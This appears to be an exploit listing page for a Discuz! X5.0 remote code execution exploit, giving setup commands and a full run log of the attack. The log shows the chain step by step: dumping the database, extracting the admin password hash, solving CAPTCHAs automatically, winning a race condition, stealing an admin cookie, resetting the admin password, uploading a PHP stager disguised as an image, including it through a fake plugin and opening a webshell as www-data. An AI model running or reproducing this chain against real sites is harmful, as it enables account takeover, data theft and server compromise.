Share 
## https://sploitus.com/exploit?id=C05A4F3C-033F-5533-8A5C-19976624584B
# setup
```
pip3 install Pillow torch torchvision
```

# run
```
$ python3 exploit.py http://localhost/discuz5/

+----------------------------------------------------+
| Discuz! X5.0 Remote Code Execution Exploit by EgiX |
+----------------------------------------------------+

[+] Getting authcode for DB export
[+] Authcode: 61feiuI8ReSHRHUDKl2DXeB1QMcdNX6Mpu0gZ8OBS5qRgmQ6Jg3W6mrNVooNqITEtQOd4WUMlGNlQSz7WD6s
[+] Exporting DB
[+] Downloading DB dump
[+] Searching for admin's username and MD5 password hash
[+] Admin username: admin
[+] Admin MD5 password: 96b21b6bfc5fe6d4530f8345fbcfbc6d
[+] Registering new 'special' user
[+] Username: 96b21b6bfc5fe6d4530f8345fbcfbc6d	1	c55a895b
[+] CAPTCHA is enabled
[+] Downloading CAPTCHA
[+] CAPTCHA prediction: CY46
[+] Getting authcode for DB import
[+] Authcode: 553fh4gPsIhwsSdSKb1ti6SqITi945W2I%2BEyoYCMwVQeMqfyp4ekIwTPqzKkU7hfTHqVg0FhhR9Ic3kiUkkGVsbzkDOIcRpL7bCHUKRKha6KxPeOoud0qxEZPqk
[+] CAPTCHA is enabled
[+] Downloading CAPTCHA
[+] CAPTCHA prediction: CMJ6
[+] Performing race condition attack
[+] ๐Ÿ† Race condition attack success!
[+] Admin authentication cookie: ef196PBDlZZvpe3Fze5ZW36x3%2B7i9cukujemIqJ%2BH1vGJCBmVWLlNVa2OCnq2lAsLjFhrC5x55Wgh3mlqgSnlwXKRqvhQbDaZguSq5hboelr
[+] Waiting for the import process to finish
[+] Resetting admin password
[+] Performing login into admincp
[+] As admin: uploading PHP stager as PNG image
[+] As admin: importing fake plugin
[+] As admin: importing Local File Inclusion (LFI) plugin
[+] As admin: triggering PHP stager LFI
[+] Launching webshell

discuz-shell# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

discuz-shell# pwd
/var/www/html/discuz5

discuz-shell# exit
```